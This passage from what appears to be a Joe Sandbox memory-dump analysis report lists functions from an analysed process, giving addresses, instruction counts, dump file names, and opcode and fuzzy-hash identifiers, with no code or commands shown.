                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 617ba875a32ecbbd8a3c6b6ea78808383c871a52aab9bf16f96dc7301387e8eb
                                                  • Instruction ID: f549206023569682b30531dd43da97cf8420d9dcc393aee5a0d3fe4dcb291b45
                                                  • Opcode Fuzzy Hash: 617ba875a32ecbbd8a3c6b6ea78808383c871a52aab9bf16f96dc7301387e8eb
                                                  • Instruction Fuzzy Hash: 5A61BA30B043049FDB18EBB9D41466E7BA6AFC6311F2484ADD40ADB791CB35EE02DB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAF6F8 Relevance: .2, Instructions: 187COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94ef9089066363eb11f1b56ca6376113d52b6ef0d76fc3d4f77c4c544487d9e5
                                                  • Instruction ID: 1334b85383131e62ec74ac6613b407047604416256c6e660c2d231b5c3dd6ba9
                                                  • Opcode Fuzzy Hash: 94ef9089066363eb11f1b56ca6376113d52b6ef0d76fc3d4f77c4c544487d9e5
                                                  • Instruction Fuzzy Hash: E3613874D19308DFEB54CFA9D4446EEBBFAEF89300F10A129E419AB255DB306942CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08959F41 Relevance: .2, Instructions: 162COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13af550ee7e66ef7c894f5e36c2fea8ad2264d90d59dd1db7900d5489511d6fd
                                                  • Instruction ID: c9352426bd9297372d1ce11f48037d51e1fd9fa902f05a1c0d94c53ec2b9601c
                                                  • Opcode Fuzzy Hash: 13af550ee7e66ef7c894f5e36c2fea8ad2264d90d59dd1db7900d5489511d6fd
                                                  • Instruction Fuzzy Hash: 89512774E09228CFDB10EFA8D885BEDBBF9BB49301F205129E809AB345DB345944CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08958BA0 Relevance: .2, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f6b3691207d522f6e04d552c64fca329762a6314ac20936d243184c46e21b85
                                                  • Instruction ID: 10b929bb698ee9dcb595bad6a0cd39f7ae761f8d5b723bfe47e94442c31cac61
                                                  • Opcode Fuzzy Hash: 5f6b3691207d522f6e04d552c64fca329762a6314ac20936d243184c46e21b85
                                                  • Instruction Fuzzy Hash: 6B517F30E00219CFDB04EBA9D8557EEBBF2FF89355F20856AD805BB654DB309945CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08953992 Relevance: .2, Instructions: 154COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c7c57bcf8c67e19bb96d1257b8d3b62438281a1ce662a9fc68b98a78ac757c9
                                                  • Instruction ID: d1b7705f0a1570d82746fe6867be52d5476b79e7814911362f7e517ce0463759
                                                  • Opcode Fuzzy Hash: 1c7c57bcf8c67e19bb96d1257b8d3b62438281a1ce662a9fc68b98a78ac757c9
                                                  • Instruction Fuzzy Hash: 73517B30600205CFDB15DF39C894BA9BBB5AF8A345F1581ADE806DB362DB30EC45DB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EA6D14 Relevance: .2, Instructions: 153COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9e2e0f10d5f2d7f72e3696f4aaaa9b9c3262aeb5ab62a42f63143a6d81728e8
                                                  • Instruction ID: 58c22eba11ea4c2dadae80bde70344205f83825077866845e96abc79475613e2
                                                  • Opcode Fuzzy Hash: f9e2e0f10d5f2d7f72e3696f4aaaa9b9c3262aeb5ab62a42f63143a6d81728e8
                                                  • Instruction Fuzzy Hash: 5B51A135B003058FDB05DBB9D8549AEBBF6FFC4324B148969E419DB351EB30AD058BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08959D48 Relevance: .2, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 28987ef335bf2834cdaf532301d315a43ff20fc48e25203ef2d5d38c11f670ee
                                                  • Instruction ID: e893ed882b5f80ef3204831398195f02e7b1807e1fb6e552b4d9ac294bafe9c0
                                                  • Opcode Fuzzy Hash: 28987ef335bf2834cdaf532301d315a43ff20fc48e25203ef2d5d38c11f670ee
                                                  • Instruction Fuzzy Hash: 37512974A09218CFDB10EFA8D485BEDBBF9BB49301F205219E809AB385DB345E45CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAFCF0 Relevance: .1, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8fa84d1256402c2ca2c222838ae8e6ac108e493fa1fbcbede57dedf361dcf90e
                                                  • Instruction ID: c1bcfb00c63a70ed3d64c3514d00a1c240bdb51f88a5a996ef755693889c6dbd
                                                  • Opcode Fuzzy Hash: 8fa84d1256402c2ca2c222838ae8e6ac108e493fa1fbcbede57dedf361dcf90e
                                                  • Instruction Fuzzy Hash: 1A418D71A003198FCB55EFA9D8446AFBBFAEF88250F10842AD455EB340DB34A901CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895FA10 Relevance: .1, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1bec180deb7190f72fe5bf4f39e9554cb1b387ca3c8f392958a71be3589ae5a9
                                                  • Instruction ID: 96eebed390b3f28703a161639df0ebac12f81b553c0a889bf4a69048501a48e6
                                                  • Opcode Fuzzy Hash: 1bec180deb7190f72fe5bf4f39e9554cb1b387ca3c8f392958a71be3589ae5a9
                                                  • Instruction Fuzzy Hash: 81410670D09209CFDB08DFAAC5446EEBBF6AB8C312F14D42AD819A7251EB344A41CF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08951352 Relevance: .1, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e497349d92d54affe86f0249383aea36096d9eb886b23337b1e3429483847107
                                                  • Instruction ID: 49b18fb1d22ecd386c39e2c8c018aa83016d38caa49007a31e30a33ed5ddf004
                                                  • Opcode Fuzzy Hash: e497349d92d54affe86f0249383aea36096d9eb886b23337b1e3429483847107
                                                  • Instruction Fuzzy Hash: 9A416C30300601CFDB29EF24C898B6EB7F6BF8561AF14856DD5068B3A1CB71AC46CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08951360 Relevance: .1, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb6f3f35a3ce3dbf47031babc8d4d0bf594bc6ee3b5c9d9de0898d07cc5141fc
                                                  • Instruction ID: 47be06ae339bcb68ce88d4754a0e84cef2e89ee68959eab673bcf9a0769fd082
                                                  • Opcode Fuzzy Hash: fb6f3f35a3ce3dbf47031babc8d4d0bf594bc6ee3b5c9d9de0898d07cc5141fc
                                                  • Instruction Fuzzy Hash: 94411A30300601DFDB28EF64C498B6AB3F6BF8571AF14856DD5068B3A4CB71AC46CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAC4D8 Relevance: .1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a65928b46e5a86fd7d87d2aeafec6fae80070dfd0799608c7baa614c1e3f431c
                                                  • Instruction ID: d9ab254c275886df2d14854b863142c9ea3143ae64eef56f16ec49cbb7122864
                                                  • Opcode Fuzzy Hash: a65928b46e5a86fd7d87d2aeafec6fae80070dfd0799608c7baa614c1e3f431c
                                                  • Instruction Fuzzy Hash: 51418B74E0430A9FDB45CF95D8819EEBBB2FF89350F20A429E509BB354D7709A41CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08953B8C Relevance: .1, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 860c7d445d38de88cebd4c365e2ad5ac6bf4e05004b84b76a7fe4eaefb264b4b
                                                  • Instruction ID: 93749025a81cd418e2e1268196798b0ef33644f96cf9bd454081573ce502f9a5
                                                  • Opcode Fuzzy Hash: 860c7d445d38de88cebd4c365e2ad5ac6bf4e05004b84b76a7fe4eaefb264b4b
                                                  • Instruction Fuzzy Hash: 57415130200700CFD765EB38C858B5A37A6BF86759F1585ADD85ACF3A1CF75A84ADB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAE464 Relevance: .1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99da490ee7466dd3400f3015ac095e5d387c0f7b981cf041ff2bdbb443bd8337
                                                  • Instruction ID: 1b9490516e92f0b6d6637222c742c664aa2fdeb170bfb218c42ba50b47bca5f2
                                                  • Opcode Fuzzy Hash: 99da490ee7466dd3400f3015ac095e5d387c0f7b981cf041ff2bdbb443bd8337
                                                  • Instruction Fuzzy Hash: 7C3157B59003099FDB14DFA9D884ADEBFF9FB48320F10852AE809A7310C734A944CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08959D5F Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42ea3e2dc6355abb79d44765e3cc70ebc7bdded7e725d4986235fc4c54dc3556
                                                  • Instruction ID: 961a8ae17b3a22e30e103a5fac9ffff6980816ce196d89613097df6ec904b285
                                                  • Opcode Fuzzy Hash: 42ea3e2dc6355abb79d44765e3cc70ebc7bdded7e725d4986235fc4c54dc3556
                                                  • Instruction Fuzzy Hash: D441D174A05228DFEB64EF64D844B9DBBB2FB89301F1081D9E80AA7345DB305E81DF42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08954B12 Relevance: .1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87548d9c4c5ddd400616b3819c99f93b1e313501d5217072e5687572ac6befb4
                                                  • Instruction ID: b3bf6556ae5386078cfff9509b8a50829185aec35881c9960c69063e4694b586
                                                  • Opcode Fuzzy Hash: 87548d9c4c5ddd400616b3819c99f93b1e313501d5217072e5687572ac6befb4
                                                  • Instruction Fuzzy Hash: 8A317A747002149FCB14EF68C884A6D7BBABF88621F114299E925DB3B1CB71DD42CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 089520C8 Relevance: .1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c00d48def93167d5879c4485a04ba66b1bb64155a7c9cc5c3fdf8fd8abaabb5e
                                                  • Instruction ID: bda7930833423e520318f994d015ae5f3d088cff098fae518f9329f7fb0f99c9
                                                  • Opcode Fuzzy Hash: c00d48def93167d5879c4485a04ba66b1bb64155a7c9cc5c3fdf8fd8abaabb5e
                                                  • Instruction Fuzzy Hash: A1311E343006018FD718EB69C884B5A73EABF85615F1584ADE909CB371DF30EC42CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08954B20 Relevance: .1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 305c6fa701c65ca5381b1b2591141765368f24ec5bb1a7e88c24ff5572ee3c06
                                                  • Instruction ID: 1ff02cd441ef4e79ad5f1875f6159756f99153798774c20f22b37b38abdb86f5
                                                  • Opcode Fuzzy Hash: 305c6fa701c65ca5381b1b2591141765368f24ec5bb1a7e88c24ff5572ee3c06
                                                  • Instruction Fuzzy Hash: 27315C747002149FCB54EF68C884A6E77B6FF88625F104259E9259B3B1DB71DD42CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 089520B8 Relevance: .1, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 43112ff3be849934b3bc1d8c4d7cd57f60e37b5c5767a7dbbaf69582abb7c120
                                                  • Instruction ID: f78db9014b2e24f67aedbd1fb58e4dac78271323a236d84f4304a10238941d4e
                                                  • Opcode Fuzzy Hash: 43112ff3be849934b3bc1d8c4d7cd57f60e37b5c5767a7dbbaf69582abb7c120
                                                  • Instruction Fuzzy Hash: E3311934300601CFD718EB68C884B5A77A6BF8961AF1580A9DA5ACB371DB30EC42CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895C7E8 Relevance: .1, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: edf2e4fc080e38381fe3410bb7c16a109f1a688d18eaa5fd0f266bf98c7e8739
                                                  • Instruction ID: 32d0a97b612c42d02969c2414d78a833a29bba84757ca26c837ec43209443520
                                                  • Opcode Fuzzy Hash: edf2e4fc080e38381fe3410bb7c16a109f1a688d18eaa5fd0f266bf98c7e8739
                                                  • Instruction Fuzzy Hash: 4A319A74E04208DFDB04EFA8D4416EEBBFAEF89306F10946AD915AB351DB389901CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895B922 Relevance: .1, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ddf0010df18dcfb306c051281198b965fb9c2a32d6ea660cc95115cb2670b259
                                                  • Instruction ID: 8afb473851aa9d302a3c35c8c7d0bb376de05ce431612b52c16b3f6fcd337f4c
                                                  • Opcode Fuzzy Hash: ddf0010df18dcfb306c051281198b965fb9c2a32d6ea660cc95115cb2670b259
                                                  • Instruction Fuzzy Hash: 9A316934E08249CFDB04EFA8D4516EEBBF5EB89315F10956AD809B7350EB341A01CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895B928 Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eff3cf22ae4792b7104c65352a43ca77a6009d04de784e05f905446cbb98085e
                                                  • Instruction ID: 4574fd9ac4564a4a77c433e408fccea8df901afe43aeb89eb4e2180dd49def10
                                                  • Opcode Fuzzy Hash: eff3cf22ae4792b7104c65352a43ca77a6009d04de784e05f905446cbb98085e
                                                  • Instruction Fuzzy Hash: C8314574E08209CFDB04EFA9D4516EEBBF9EB89315F10952AD809A7250EB345A01CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08952DA0 Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 06335334d39b7511a200978b4537a82d99d960633e6821d7d992bd09c5bd739d
                                                  • Instruction ID: 4023372ae7b0bc686d2bcc89480a77f529416f3eb13999b39723f345894cba0e
                                                  • Opcode Fuzzy Hash: 06335334d39b7511a200978b4537a82d99d960633e6821d7d992bd09c5bd739d
                                                  • Instruction Fuzzy Hash: 5821C3347002018BAF15B7B9946873E36EB9FC9946359442DDC0BCB394EF24DD0787A6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 089525D4 Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca478fe0e24bfcc8997b4a1a9598f50c11f6f73e3e449af03e798f4e08b1a272
                                                  • Instruction ID: af5fb300aff61b297b687fc59ec412081e881da2e1722b71fd5afc7a843c7d85
                                                  • Opcode Fuzzy Hash: ca478fe0e24bfcc8997b4a1a9598f50c11f6f73e3e449af03e798f4e08b1a272
                                                  • Instruction Fuzzy Hash: 48313E30200700CFD764EF28C858B5677A9BF8576AF50C56DE85A8B3A1DF71E88A9B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895C7F8 Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8424c331e8e0d19e02a6d7456199d0eb7d7468a5c94514e278de585733a8da1d
                                                  • Instruction ID: 6e3e753d129753c9327f08d1b5903075da1abb57d5fa18e6de0e21c331a09b3b
                                                  • Opcode Fuzzy Hash: 8424c331e8e0d19e02a6d7456199d0eb7d7468a5c94514e278de585733a8da1d
                                                  • Instruction Fuzzy Hash: 41313A74E04209DFDB04EFA9D4456EEBBF9FB88306F10946AD915AB344DB349941CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08955CA1 Relevance: .1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3dc9ff110f6ec6df4cd18b8ad97ef2e495652bdea9de046fa247bf28903de552
                                                  • Instruction ID: 75391a0223cfc4b9b7156b8ff119a934695e0b27b579025d0ba7a35a832142b9
                                                  • Opcode Fuzzy Hash: 3dc9ff110f6ec6df4cd18b8ad97ef2e495652bdea9de046fa247bf28903de552
                                                  • Instruction Fuzzy Hash: AA31F835204385CFC725FF34C49086A7BF5BF823067204A7EE8959B692DB35E885CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08952A6D Relevance: .1, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f308e4b058ba0df8f6c4c15bd6a2d67db0a701c2d4a5c87ba591aea30e5669ac
                                                  • Instruction ID: 337b214ea4f3d3ec0bba293f7790367bea1f9437d5f205d25741702471e78575
                                                  • Opcode Fuzzy Hash: f308e4b058ba0df8f6c4c15bd6a2d67db0a701c2d4a5c87ba591aea30e5669ac
                                                  • Instruction Fuzzy Hash: CA31E734A00204CFDB25EFA5D558A9D77F6AF89316F159468E806AB3A0DB31ED81CF21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EADDE0 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88c0284530c9805334fda28df19b00c7b0f8dac8d3ab96eb705af28ac6132190
                                                  • Instruction ID: e53b7e098c6ec7c6d7d11e206fa3b2e0f634a83ca7fbe5eac9e73392a41ea145
                                                  • Opcode Fuzzy Hash: 88c0284530c9805334fda28df19b00c7b0f8dac8d3ab96eb705af28ac6132190
                                                  • Instruction Fuzzy Hash: E83106B4E04219DFEB44EFA9D8416AEBBF5EF88300F109169E405AB354DB346A01CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8D3D8 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1580725645.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_c8d000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c57039095f821916ee90854e12a5977aa3a7537378fddbf5c51741885b9ca904
                                                  • Instruction ID: 86085e9fac6311f3d060ed0dceaec48be86630d30e9b6a56106a3ea18285ed70
                                                  • Opcode Fuzzy Hash: c57039095f821916ee90854e12a5977aa3a7537378fddbf5c51741885b9ca904
                                                  • Instruction Fuzzy Hash: 0F212875504304DFDB04EF10D9C4B16BB65FBD4328F20C16DE80A0B296C336E856CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08952258 Relevance: .1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8295b59fbddfe316bf30b616a14819f827ce30d33046f8cece3f0f85d6ce940
                                                  • Instruction ID: 2d83773f99e07b28b74190c68fedbd5775f5d4b23ebff0fcec7bbf305afc8008
                                                  • Opcode Fuzzy Hash: d8295b59fbddfe316bf30b616a14819f827ce30d33046f8cece3f0f85d6ce940
                                                  • Instruction Fuzzy Hash: CC3116342006008FC765EB68D488BA577A6BF85715F5584A9E49ECB262DF71A88ACB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08952D90 Relevance: .1, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
